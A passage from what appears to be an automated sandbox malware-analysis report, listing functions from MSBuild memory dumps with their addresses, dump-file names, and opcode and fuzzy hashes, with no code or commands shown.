                                                                                                                                                                                                                                                • Instruction ID: 6165a74db300b5d804317bf2fa8b901045a2cbd21fd6848fea4a4de4d6f67a4f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d45893d42ba43b3e6a6748025432075fa60f64ad32a837dcc06ce7e37249cc0d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D31123B37092665FE715CA69F8416AAF7EAEFC4330F198237E504CB190D735A812C790
                                                                                                                                                                                                                                                Function 071B3418 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4dfee10a0de1e2a40cff472c23559cd1e2aaa5c3460417ccf87dc0b25e9ee68e
                                                                                                                                                                                                                                                • Instruction ID: dc59f34b9af29ec01a8d0fe70f61b8c20aeb5e104fbd4111d3e9c961ec748ab4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4dfee10a0de1e2a40cff472c23559cd1e2aaa5c3460417ccf87dc0b25e9ee68e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A221CC717007449FC726CF6AC848996BBF6EF44320B06C5AAE45ACB6A2CB34EC05CB40
                                                                                                                                                                                                                                                Function 070917AB Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5b40bf9a69b1ace31f2a4c66be4f2efa977458af1a604d69592d8f9b88d192c6
                                                                                                                                                                                                                                                • Instruction ID: d952f958117f384420411c72000e203f56bf8b97d38b2e227280ed8558d771e7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b40bf9a69b1ace31f2a4c66be4f2efa977458af1a604d69592d8f9b88d192c6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C31F574E012199FCB44DFA9D4409EEBBF2FF88300F20816AE915A7354DB35AA05CF91
                                                                                                                                                                                                                                                Function 072AAA10 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d71c562519972a06c4947c0d26b3749db858021b85cd9d219544795b17b7cd0e
                                                                                                                                                                                                                                                • Instruction ID: 5546cc8203ce6d894b38e019de0a3f1d20fb6d722f4266c909d0cfdde28a0eff
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d71c562519972a06c4947c0d26b3749db858021b85cd9d219544795b17b7cd0e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE215EB0710206EFDB24AA35C580AAAB3F6FF89310F118479D8099B791DB75DC02CBE1
                                                                                                                                                                                                                                                Function 0711AEB8 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c5db819e8aebe1b33c5c967b342322d473abf32c0ce7c156b3255754e6e83f26
                                                                                                                                                                                                                                                • Instruction ID: fa43249d7a0491700d219178781c80a790598c5795489f0803c9f63fb446d415
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5db819e8aebe1b33c5c967b342322d473abf32c0ce7c156b3255754e6e83f26
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F118FB23022119BD7156B29B85416EBBABEFC1266714417AE50ACB2C0CF79D846C750
                                                                                                                                                                                                                                                Function 0711A600 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f6d1ae30b325d094c235f25e90a14bfdc7d5f54bab0ce30742932363384d558b
                                                                                                                                                                                                                                                • Instruction ID: 59dd9df49deff67ab292a5dddc028a2969293f008158eb80b9eae8d6e1121696
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6d1ae30b325d094c235f25e90a14bfdc7d5f54bab0ce30742932363384d558b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7215B71301340AFD325DF24D854E5ABBF6EF85724B1584A9E5868F3A2CB31ED45CB90
                                                                                                                                                                                                                                                Function 07118132 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cde8ccb9476d4803b0164b8da1efdd16d5f2e0e406133b4117bcaf43cf0fac23
                                                                                                                                                                                                                                                • Instruction ID: dee34d8930783e1b6e7362f7303f34bee510763e6c989bdfa2883cf0c5331fe0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cde8ccb9476d4803b0164b8da1efdd16d5f2e0e406133b4117bcaf43cf0fac23
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A214FB1B002109FC715DF78C844E6ABBF6BF89620B1146B9E50ADB3A5DB30EC41CB91
                                                                                                                                                                                                                                                Function 07096790 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 97953addd5eae93192deb1254e10306974ceea3472e5a77fff39e3b125508db4
                                                                                                                                                                                                                                                • Instruction ID: d4db33c1996360efac55dd9f88fe4e0548b98412b9cf5982b6f988a2d6241c92
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97953addd5eae93192deb1254e10306974ceea3472e5a77fff39e3b125508db4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5711E1B17007028FDB209B68D444A5BBBF6FFC5624714476EE946CB300DB76DC058B91
                                                                                                                                                                                                                                                Function 0711B008 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6b3aa58369beaf0c781b2d5313212fad1c80e534ba00098c11b8c7bb3eff1089
                                                                                                                                                                                                                                                • Instruction ID: 559e55542ef8e0d4e34297ccd9fc7ca6962c52c23ab0c16f3da012800bd700b9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b3aa58369beaf0c781b2d5313212fad1c80e534ba00098c11b8c7bb3eff1089
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E11B6B17047019FD7368F66E480E23BBB7EF81324714857AD65A8B652C732EC85CB50
                                                                                                                                                                                                                                                Function 070917B8 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 530804e36ed96af6fe15319a7487d2a555b756cb5b8ba54b13aec3be8ffe760e
                                                                                                                                                                                                                                                • Instruction ID: aced14434e032530dc3e2d4f54047a9c3d4e42eb038abad65aaf667a4d5062ab
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 530804e36ed96af6fe15319a7487d2a555b756cb5b8ba54b13aec3be8ffe760e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF21D374E012199FCB44DFA9D4409AEBBF2FF88300F20816AD905A7354DB35A901CF90
                                                                                                                                                                                                                                                Function 072A3839 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d7b4ff5e4b544cbc5828bedd8f21450d09bf10ddb41144753b3199bc21e8edd0
                                                                                                                                                                                                                                                • Instruction ID: 6bbca0cc72cea24926827e0ea2f7b9ccf618ca1e1e999af8bceca364f5b9e0bf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7b4ff5e4b544cbc5828bedd8f21450d09bf10ddb41144753b3199bc21e8edd0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C1191B5210305BFDB159E64D840BEA7BA6EB85320F148069FA059B282C771DD49C7A0
                                                                                                                                                                                                                                                Function 0124D006 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1647786671.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_124d000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 101b9261c63253edda9be2c26cc3e67a27f6850c6a9b9a3bc749efdf6e50779b
                                                                                                                                                                                                                                                • Instruction ID: b9a49c49cdc704cd5dff2f177886542a75961b3702254e2e15c097f4c6d7f6ca
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 101b9261c63253edda9be2c26cc3e67a27f6850c6a9b9a3bc749efdf6e50779b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A21B0714083849FCB07CF64D994711BF71EB46314F28C5EAD9498F2A7C33A980ACB62
                                                                                                                                                                                                                                                Function 071167D0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1f8423dbda51a3043c8140f39a028b1972df7211c8d0b8beabe780a7ed9155cc
                                                                                                                                                                                                                                                • Instruction ID: b0dd21a02e95677da1c83599ccf4fb50a33c8ea76416f1e7db0c3be75c82c67a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f8423dbda51a3043c8140f39a028b1972df7211c8d0b8beabe780a7ed9155cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0311E5B2B047209FD325DA689C41B6BB3D6EBC8660F10423AEA05DB390DF71DC0187D0
                                                                                                                                                                                                                                                Function 071BEB70 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2873d79adba286fb66153b3f4ef314f28bf6fdd23e6eacb517a6910c322da314
                                                                                                                                                                                                                                                • Instruction ID: 1fdfbe7652e032ea9593bd1e9ec9b957d1c64f6da97e96480806b1b6af1d711e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2873d79adba286fb66153b3f4ef314f28bf6fdd23e6eacb517a6910c322da314
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E71124B4534101CFCB6C5BA1A55E5EC3BB2BB42301F630624F1038A1C0CB3CE9998A73
                                                                                                                                                                                                                                                Function 071BDDB8 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3dce7ffa39d63270b2b56bc65d250eef05f4ec983161922d9efb6d14171571e8
                                                                                                                                                                                                                                                • Instruction ID: 2089e89a6153dd9b6fa9893e6fa3ca382dcf0771e0c73b6af3d7e3c84b7181bf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3dce7ffa39d63270b2b56bc65d250eef05f4ec983161922d9efb6d14171571e8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03112CB07143428FCB3E9B78F4101693BD69B866407450669D449CF2C1DF24DC41C7A6
                                                                                                                                                                                                                                                Function 071BE9E8 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5d3e5bcedbc830e161b1485a62c2b9b26c11977f161662256148615fd305b585
                                                                                                                                                                                                                                                • Instruction ID: 43f35f5b49bc7c633ff8623e6a44308f5a5fa165c9c64680fdb44e2eae099864
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d3e5bcedbc830e161b1485a62c2b9b26c11977f161662256148615fd305b585
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA11A3F1700215ABD224E769D8809EEB3DAAFC4A20B05862DE50A9F395DF70DC058BD5
                                                                                                                                                                                                                                                Function 0709F2D8 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e41967173b623b49e8fc1bd45cbcb649180185d3cd542372398bfbbe83bb472c
                                                                                                                                                                                                                                                • Instruction ID: 44273e1f55430de53e22d2399081d2ef158a56f06178e5ae119387cc130623fe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e41967173b623b49e8fc1bd45cbcb649180185d3cd542372398bfbbe83bb472c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C115EB1B002069BCF64AB69E85C6EEBBF5AB88721F044139E406E7244CF745C41CB94
                                                                                                                                                                                                                                                Function 0711D5D8 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: eda12e63b2bff5d9e9fa4b16e371a6236c9d1b676e69e0644c38da7854050265
                                                                                                                                                                                                                                                • Instruction ID: 3b6fbb450d38b09df35c198117527d0dbbffb57b7aba03c8060b5e3fb86acb12
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eda12e63b2bff5d9e9fa4b16e371a6236c9d1b676e69e0644c38da7854050265
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9218B71A00348AFDF15DFE0D890AAEBBB6FF48310F14806AEA55AF285D731A845CF40
                                                                                                                                                                                                                                                Function 0711B0C0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9eef5c13e0d05258c43e97b38df6c3a122d2561093048fce499e7f8b023b4d0a
                                                                                                                                                                                                                                                • Instruction ID: 895f3da47002eb139ecb08b3cfb1351e074efc7ae888a4b947ea1c79d16b5e36
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9eef5c13e0d05258c43e97b38df6c3a122d2561093048fce499e7f8b023b4d0a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 130192F131C2025BE735597BAC4477A669FABC6650F1A403AA70BCB7C0DF65CC418662
                                                                                                                                                                                                                                                Function 071BE9D9 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7130840c65fb36070a15fff22ec0cc1cb88cbda3de5d7fe1425692c87d9e08e3
                                                                                                                                                                                                                                                • Instruction ID: ca3cf170e524f67091070254c19ac9f5c1cfc5049925fee94b59f6de3a379dd8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7130840c65fb36070a15fff22ec0cc1cb88cbda3de5d7fe1425692c87d9e08e3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8911E9F5704211ABC335D775D8809EEB79ABFC5A20B05862EE50A8F291DF70DC098BD2
                                                                                                                                                                                                                                                Function 07097748 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7f11efc067b4db96df801f4dfd325d0e8d715dbaa1cd9c3c41a3a3364c4aeb4e
                                                                                                                                                                                                                                                • Instruction ID: 139a9a6ab30ba0a3f56130792355e991bb41ea4102e484589930272548569550
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f11efc067b4db96df801f4dfd325d0e8d715dbaa1cd9c3c41a3a3364c4aeb4e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5219075A1060A9FCF15DF59C8C48AAFBFAFF84310B1485A6E90997265DB30F814CBA0
                                                                                                                                                                                                                                                Function 07092413 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fc88e86edbbc2731865fb00ed1573a4fa6c9559b56032fca5162708e0c731792
                                                                                                                                                                                                                                                • Instruction ID: ac855e5d8875a23aa895f74b352fab4e0ecd6d8eb74d73c9e82abda7f6e36e25
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc88e86edbbc2731865fb00ed1573a4fa6c9559b56032fca5162708e0c731792
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D111CEB26043566FDB20CE18D8407FB7BF5FB41230F04467AE142CB183C651C948E361
                                                                                                                                                                                                                                                Function 071BEB80 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3826408266cb03ae0723bad5c6f5f9034462899377c01eafcde355e129edae81
                                                                                                                                                                                                                                                • Instruction ID: 33448ec32f31ef3244148cde8e7c86187827ee4cd7f6417925b842a970927498
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3826408266cb03ae0723bad5c6f5f9034462899377c01eafcde355e129edae81
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B511D0B4534102CFCB6C5BA5A95E5EC77B6BB42241F634624F103CA190DB38ED998A73
                                                                                                                                                                                                                                                Function 0709F510 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 766aabacce33997bfdee309363fb0a165d74754aa3ebf0eaadc9b06bc90f414d
                                                                                                                                                                                                                                                • Instruction ID: 5211aa4100ab176915a9b93f3f2555ac245d683ef1db4e0dba9a72e3e5c45bf2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 766aabacce33997bfdee309363fb0a165d74754aa3ebf0eaadc9b06bc90f414d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB112CB1704341AFDB11CB78D804F927BE5EF81330F0582AAE659CF6A2D7A1E945DB41
                                                                                                                                                                                                                                                Function 071B7D08 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 327afa9b4a497b36d19fbe50cb7178ced828425e0ac9d1255b574a57de367893
                                                                                                                                                                                                                                                • Instruction ID: 01d180d6a202db4bbae8e844541cf1e27dd84d9b2b618c04f598ec2621fc983f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 327afa9b4a497b36d19fbe50cb7178ced828425e0ac9d1255b574a57de367893
